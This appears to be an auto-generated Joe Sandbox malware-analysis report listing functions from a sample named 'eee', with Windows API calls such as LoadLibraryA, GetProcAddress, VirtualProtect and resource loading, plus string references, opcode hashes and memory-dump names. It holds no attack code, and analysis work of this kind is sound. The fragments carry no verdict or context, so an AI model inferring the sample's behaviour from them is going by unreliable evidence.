Associated: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: File$CreateWrite
String ID:
API String ID: 2263783195-0
Opcode ID: fbb4f5668513936e7be51f007b1b3098afc6470ae9cc4ce0ea2d391aaaf1d36c
Instruction ID: 7c79b2bd3d3592443f105d5dd0ba306b6eb3e251edb2a88f018aac3f6b75dff5
Opcode Fuzzy Hash: fbb4f5668513936e7be51f007b1b3098afc6470ae9cc4ce0ea2d391aaaf1d36c
Instruction Fuzzy Hash: 542162B49043059FDB00EF68C584B5EBBF0FB84314F118A69E8A49B391D779D949CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0040F292 Relevance: 3.0, APIs: 2, Instructions: 34
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 0040F2B4

Part of subcall function 0040F990: EnterCriticalSection.KERNEL32(?,?,?,00411EC0,00000008,00418D38,00000008,00411F8E,00000000,00000001,00000000,0040F6E6,00000003), ref: 0040F9B8

RtlAllocateHeap.NTDLL(00000000,0040F6E6,004189D0,0000000C,0040F31D,000000E0,0040F348,0040F6E6,0040F913,00000018,00418BD8,00000008,0040F9A9,0040F6E6), ref: 0040F2F5

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: AllocateCriticalEnterHeapSection__lock
String ID:
API String ID: 409319249-0
Opcode ID: f54f7d4d064511316be85401c52bc4b626ff46f67976a7d4391481e800346201
Instruction ID: bfe29eb8e0b892ec9fcc6600b90631ddc3bb7ae31b581b007ff509296bfb1a3b
Opcode Fuzzy Hash: f54f7d4d064511316be85401c52bc4b626ff46f67976a7d4391481e800346201
Instruction Fuzzy Hash: B3F06272D412159ADB30AB65AC067DE7760BB01364F64427FE86077AE0CB7D1D498A8C

Uniqueness

Uniqueness Score: -1.00%

Function 00408250 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE ref: 00408253
FindCloseChangeNotification.KERNELBASE ref: 0040828D

Memory Dump Source

Source File: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: ChangeCloseFileFindNotificationRead
String ID:
API String ID: 1200561807-0
Opcode ID: bdfeacb585a997c4184f25d0f042f9c13172ebd33122e7bc18fc57cfe1b6e87a
Instruction ID: 19cec51daf2bc5475c696cc04d371bdbf0ef5c8f974d75c5342bf7a47670ded6
Opcode Fuzzy Hash: bdfeacb585a997c4184f25d0f042f9c13172ebd33122e7bc18fc57cfe1b6e87a
Instruction Fuzzy Hash: 9CF0ACB8610604DFDF04FF78D684A5ABBF0EF88304F1186A9EC919B395D634E945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00411275 Relevance: 3.0, APIs: 2, Instructions: 26memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,0040F18B,00000001,?,004189C0,00000060), ref: 00411286

Part of subcall function 004112C6: HeapAlloc.KERNEL32(00000000,00000140,004112AE,000003F8,?,004189C0,00000060), ref: 004112D3

HeapDestroy.KERNEL32(?,004189C0,00000060), ref: 004112B9

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: Heap$AllocCreateDestroy
String ID:
API String ID: 2236781399-0
Opcode ID: 7456a30f00a5b292842db5eb1166ecdbdbe3adac40e817aa6e535cab7e2d121e
Instruction ID: 818f6fb2a661df19534a86652fea8074b7b6026b23e5b303482912ded27aeff8
Opcode Fuzzy Hash: 7456a30f00a5b292842db5eb1166ecdbdbe3adac40e817aa6e535cab7e2d121e
Instruction Fuzzy Hash: B1E04FB5B50340AADB10AB357C05BE636E4EB85746F10C87BF605E51B4EF788980AA4D

Uniqueness

Uniqueness Score: -1.00%

Function 00405070 Relevance: 1.7, APIs: 1, Instructions: 208libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE ref: 00405234

Memory Dump Source

Source File: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: ffd2c63b96e100887bf756a87bf6a5219b328ece4bf2dda36a3b0e398fe7aff6
Instruction ID: b05a0ead6e952f95cb0fb8226f624f3a95d2f88f25ca552b5d1f7a19e1cd6d22
Opcode Fuzzy Hash: ffd2c63b96e100887bf756a87bf6a5219b328ece4bf2dda36a3b0e398fe7aff6
Instruction Fuzzy Hash: C7A140B8A057199FCB44DFA9C484A9EFBF0FF88310F11896AE898E7351D634A841CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0040816F Relevance: 1.6, APIs: 1, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00402F0F,?,?), ref: 004081B1

Memory Dump Source

Source File: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5378f78da2c4c98403eab3cca802746a4e8bea53d24a3c3cecf05a841e28c913
Instruction ID: 90c81006b821f3d6c502393ae4e42e28b8de696d1c0ae79b36ac064c96fd0c1f
Opcode Fuzzy Hash: 5378f78da2c4c98403eab3cca802746a4e8bea53d24a3c3cecf05a841e28c913
Instruction Fuzzy Hash: 602143B49043099FDB00DF68C584B9EBBF0FB44314F118969E8A4AB354D774DA45DF92

Uniqueness

Uniqueness Score: -1.00%

Function 004081A0 Relevance: 1.5, APIs: 1, Instructions: 16fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00402F0F,?,?), ref: 004081B1

Memory Dump Source

Source File: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1f16a0e11b05476cc0c05523cfaab80f9e5cf41664d6733bbcd04e9acf1c48e8
Instruction ID: 73f88a4e1bae1981afa89c3448b181c2af2e3d56ad985c8f52dd4dc13efca092
Opcode Fuzzy Hash: 1f16a0e11b05476cc0c05523cfaab80f9e5cf41664d6733bbcd04e9acf1c48e8
Instruction Fuzzy Hash: 33D05E60C197809EEB026BB51A052887F705B16228F0946FFC0E2AA0D2D03C450A8B16

Uniqueness

Uniqueness Score: -1.00%

Function 00406BF8 Relevance: 1.3, APIs: 1, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(004037AA,?), ref: 00406C35

Memory Dump Source

Source File: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 098036466da016441cd4bd2aa936b085c931dd0066add279053b83e34a150aee
Instruction ID: 39aba8bbe884b27f477d7071aa8cffabfcce49bb293163acfeebf83820d1710f
Opcode Fuzzy Hash: 098036466da016441cd4bd2aa936b085c931dd0066add279053b83e34a150aee
Instruction Fuzzy Hash: ADF09878A04308EFCB04DF69D085999B7F0FB48314F01C5A9EC989B345D234E985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00406C00 Relevance: 1.3, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(004037AA,?), ref: 00406C35

Memory Dump Source

Source File: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 53806c08295841d7af74cffcb9a311a8b1968e152b905ae3fb8c33cbf9551f22
Instruction ID: 0dd548c5c7636988fa3370f478bf6b825a8a1bdf1a07833329c83d24552f4c24
Opcode Fuzzy Hash: 53806c08295841d7af74cffcb9a311a8b1968e152b905ae3fb8c33cbf9551f22
Instruction Fuzzy Hash: C7F0C278A00208DFDB08DF58C080A99B7F0FB88314F11C5A9ECA88B341C234E986CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00406C3C Relevance: 1.3, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

GlobalFree.KERNELBASE ref: 00406C54

Memory Dump Source

Source File: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 2104ccdbffc91bea4ae199b483ee9e31078baf290d4baf2a34b0d2647d84dc23
Instruction ID: 8c2ea7f5795d07d4d230e77225313e97bf9712e931236176c7728992a330b3eb
Opcode Fuzzy Hash: 2104ccdbffc91bea4ae199b483ee9e31078baf290d4baf2a34b0d2647d84dc23
Instruction Fuzzy Hash: 67D0C978504308EBDB00FF69D585A5977E4AB84224F01C265ACA99B395D274E998CE82

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040A650 Relevance: 38.8, APIs: 3, Strings: 19, Instructions: 329COMMON

Download Yara Rule

Strings

lld., xrefs: 0040A661
_tw, xrefs: 0040A6FE
.lproj\, xrefs: 0040A8B8
.dll, xrefs: 0040A968
.Resources\, xrefs: 0040A860
rtq., xrefs: 0040A82D
cols, xrefs: 0040A67A
_cn, xrefs: 0040A718
cols, xrefs: 0040A85A
cols, xrefs: 0040A8F6
cols, xrefs: 0040A7EC
Localized, xrefs: 0040A90B
coln, xrefs: 0040A684
lld., xrefs: 0040A92D
cols, xrefs: 0040A99F
lld., xrefs: 0040A834
.qtr, xrefs: 0040A948
rtq., xrefs: 0040A65A
rtq., xrefs: 0040A934

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID:
String ID: .Resources\$.dll$.lproj\$.qtr$Localized$_cn$_tw$coln$cols$cols$cols$cols$cols$lld.$lld.$lld.$rtq.$rtq.$rtq.
API String ID: 0-4255366527
Opcode ID: 04f6580654fdd35ecad3c2677e260544f43fb2598087d33e753f597ff7f044da
Instruction ID: b338fbb7ebecf841ddcf5de00e3d494d6f7103fc8fae284f6b25a174633acd1c
Opcode Fuzzy Hash: 04f6580654fdd35ecad3c2677e260544f43fb2598087d33e753f597ff7f044da
Instruction Fuzzy Hash: E8B127751083424BC715CF2898946F7BBE2EB95300F18CA3AD8D597390EB35DC5AC79A

Uniqueness

Uniqueness Score: -1.00%

Function 00415A9E Relevance: 26.6, Strings: 21, Instructions: 357COMMON

Download Yara Rule

Strings

-, xrefs: 00415C75
9, xrefs: 00415B6F
C, xrefs: 00415B96
e, xrefs: 00415BAD
9, xrefs: 00415D36
9, xrefs: 00415BCA
+, xrefs: 00415B83
1, xrefs: 00415B67
0, xrefs: 00415C42
c, xrefs: 00415BA4
+, xrefs: 00415C6C
0, xrefs: 00415B8D
9, xrefs: 00415B19
9, xrefs: 00415CAE
0, xrefs: 00415BDF
-, xrefs: 00415B88
1, xrefs: 00415CEC
E, xrefs: 00415B9F
0, xrefs: 00415D44
9, xrefs: 00415CF1
0, xrefs: 00415CE7

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID:
String ID: +$+$-$-$0$0$0$0$0$1$1$9$9$9$9$9$9$C$E$c$e
API String ID: 0-1157002505
Opcode ID: 2ff976e1d755c84deb284f6c337c752a979bac7fdf3f42afff3459bb7e6b5e98
Instruction ID: 53b3a73980048fd61266e67119364cf1c29881efcb4700608162f21ea36842ba
Opcode Fuzzy Hash: 2ff976e1d755c84deb284f6c337c752a979bac7fdf3f42afff3459bb7e6b5e98
Instruction Fuzzy Hash: 28C1C570D59A48CEEF29CFA4E5453EDBBB5EB94305F24401BE402A6291D37C59C2CB4E

Uniqueness

Uniqueness Score: -1.00%

Function 0041347E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 90libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00419200,00418A10,?,00000118,00000000,00418968,00000008,00405004), ref: 00413496
GetProcAddress.KERNEL32(00000000,004191F4), ref: 004134B2
GetProcAddress.KERNEL32(00000000,004191E4), ref: 004134C3
GetProcAddress.KERNEL32(00000000,004191D0), ref: 004134D0
GetProcAddress.KERNEL32(00000000,GetUserObjectInformO), ref: 004134E6
GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 004134F7

Strings

GetProcessWindowStation, xrefs: 004134F1
GetUserObjectInformO, xrefs: 004134E0
, xrefs: 00413533

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: $GetProcessWindowStation$GetUserObjectInformO
API String ID: 2238633743-1666607724
Opcode ID: 8b624387244eb4410e0939a40e272769ab5703396c84681e59a70c173288b792
Instruction ID: 97fedfc7286d0c4e5ee5e4cb079c9c04202b2c53fbabfe8a16cc4dd3b23e07c5
Opcode Fuzzy Hash: 8b624387244eb4410e0939a40e272769ab5703396c84681e59a70c173288b792
Instruction Fuzzy Hash: CD21E9B1640206BAEB11CFB59DC5BE73BA9AB04F81B04903BF805C2150DB78CAC5CB6C

Uniqueness

Uniqueness Score: -1.00%

Function 0040F0BD Relevance: 12.1, APIs: 8, Instructions: 134COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,004189C0,00000060), ref: 0040F0DD
GetModuleHandleA.KERNEL32(00000000,?,004189C0,00000060), ref: 0040F130
_fast_error_exit.LIBCMT ref: 0040F192
_fast_error_exit.LIBCMT ref: 0040F1A3
GetCommandLineA.KERNEL32(?,004189C0,00000060), ref: 0040F1C2
GetStartupInfoA.KERNEL32(?), ref: 0040F216
__wincmdln.LIBCMT ref: 0040F21C
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040F239

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: HandleModule_fast_error_exit$CommandInfoLineStartupVersion__wincmdln
String ID:
API String ID: 3897392166-0
Opcode ID: 4553ba245fc9ff640dc0e9cbed6b8e2b90dbed518a40fbe235e84fdabaf3495e
Instruction ID: f1ce1b8451352125acf7ae59c00721df7f23fe1d3e73492974a40bf401b91c41
Opcode Fuzzy Hash: 4553ba245fc9ff640dc0e9cbed6b8e2b90dbed518a40fbe235e84fdabaf3495e
Instruction Fuzzy Hash: A041BE71D40314DADB30AB76DC056AE36A0AF04718F20843FE414BA6D2DB7C8D86CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00409AA0 Relevance: 10.6, APIs: 7, Instructions: 102COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(00000000,?,?), ref: 00409AEE
FindResourceA.KERNEL32(?,?,?), ref: 00409B09
FindResourceA.KERNEL32(?,?,?), ref: 00409B20
LoadResource.KERNEL32(?,00000000), ref: 00409B38
LockResource.KERNEL32(00000000), ref: 00409B45
SizeofResource.KERNEL32(?,00000000), ref: 00409B55
FreeResource.KERNEL32(00000000), ref: 00409B83

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: Resource$Find$FreeLoadLockSizeof
String ID:
API String ID: 468261009-0
Opcode ID: 054beb7be8dcbe48bfa8511a20923b168665a70b1c2590680f6a00140fe713d1
Instruction ID: 9e91301b9ff9d9db6bf7b59a8a8a67854d1e0738b66c8467ce807e7ba2b3c8a5
Opcode Fuzzy Hash: 054beb7be8dcbe48bfa8511a20923b168665a70b1c2590680f6a00140fe713d1
Instruction Fuzzy Hash: 602161B66042059BD310DF65AC84A6BBBE9EBC8210F05443EFD86A3342DA78EC09C665

Uniqueness

Uniqueness Score: -1.00%

Function 00416961 Relevance: 7.6, APIs: 5, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 0041697B
GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0041698C
VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 004169D2
VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 00416A10
VirtualProtect.KERNEL32(?,?,00000002,?,?,?,0000001C), ref: 00416A36

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: Virtual$Query$AllocInfoProtectSystem
String ID:
API String ID: 4136887677-0
Opcode ID: bd0b69a23a3319d1acb8f27420eab69420735b3eacb2f3a5be7206766bb9405e
Instruction ID: 12ed7185e81904e8143460421581689280bfaf8806bab5167f69b4afff22eb8f
Opcode Fuzzy Hash: bd0b69a23a3319d1acb8f27420eab69420735b3eacb2f3a5be7206766bb9405e
Instruction Fuzzy Hash: DC31C272E40219EBCF108BA8DD45AEE7FB8EF04354F16816AE901F3250D735CA84CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040F536 Relevance: 7.5, APIs: 5, Instructions: 32timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040F551
GetCurrentProcessId.KERNEL32 ref: 0040F55D
GetCurrentThreadId.KERNEL32 ref: 0040F565
GetTickCount.KERNEL32 ref: 0040F56D
QueryPerformanceCounter.KERNEL32(?), ref: 0040F579

Memory Dump Source

Source File: 00000001.00000002.1063395899.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1063361948.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063372433.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063384451.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063408193.0000000000418000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063418616.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1063429304.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_eee.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 62b744d69a171c922bc52e5586df98e325c727ed5a74d66620902776149be1c2
Instruction ID: 481babb2cf1bbd1d53981c3c37eb593db31995ad2a0a0d209a388958f35233f7
Opcode Fuzzy Hash: 62b744d69a171c922bc52e5586df98e325c727ed5a74d66620902776149be1c2
Instruction Fuzzy Hash: 67F0ECB6D00114ABCB209FB4ED4C4DFBBF8FF0D2457464975D815EB210DA34A9048A88

